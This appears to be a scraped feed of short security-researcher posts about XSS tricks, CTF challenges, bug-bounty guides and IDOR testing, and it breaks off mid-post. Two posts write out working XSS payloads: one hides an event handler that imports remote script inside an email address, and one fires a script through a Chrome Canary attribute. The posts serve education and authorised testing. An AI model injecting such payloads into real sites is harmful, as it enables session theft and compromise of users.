XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@yourdomain .com cc Brute Logic - brutelogic.com.br/blog/xss-limit…

ooh, this works on Chrome Canary :D <input type="hidden" oncontentvisibilityautostatechange="alert(/ChromeCanary/)" style="content-visibility:auto">

there is a challenge in idekCTF 2024 called srcdoc-memos made by icesfont, it's about iframe, sandbox, CSP, navigation, session history and policy container. I spent like a week to understand how it works lol, really complex but also interesting. blog.huli.tw/2024/09/07/en/…

NotebookLM Podcast Hosts Discover They’re AI, Not Human—Spiral Into Terrifying Existential Meltdown reddit.com/r/notebooklm/s…

Learn how to conceal payloads in URL credentials and abuse them for DOM XSS and DOM Clobbering. portswigger.net/research/conce…

Released a new extension :) - console.info for postMessages from all_frames. - detects the scope of sent messages. - origins that are insecure, will be prefixed with UNSAFE. - detects if a website does not check .origin - MessageChannel API chrome.google.com/webstore/detai…

Just published a new blog post, have a look: 0x999.net/blog/exploring… Solution to the XSS challenge in the comments👇

Path traversal opens doors to secrets, source code and even RCE when chained with other exploits 📂 Level up your #BugBounty hunting skills with our practical guide to path traversal and arbitrary file read attacks 👇 yeswehack.com/learn-bug-boun…

Yay, I was awarded a $200 bounty on HackerOne! hackerone.com/no0x01 #TogetherWeHitHarder My Second bounty down — slowly but surely getting there 💪

Let's talk manual testing for IDORs. I have pasted a payload from a redacted T-Mobile API below. It does not have a bug (that I am aware of) on it, I want to use this for educational purposes because its a great teaching opportunity. A: This is a URI path parameter representing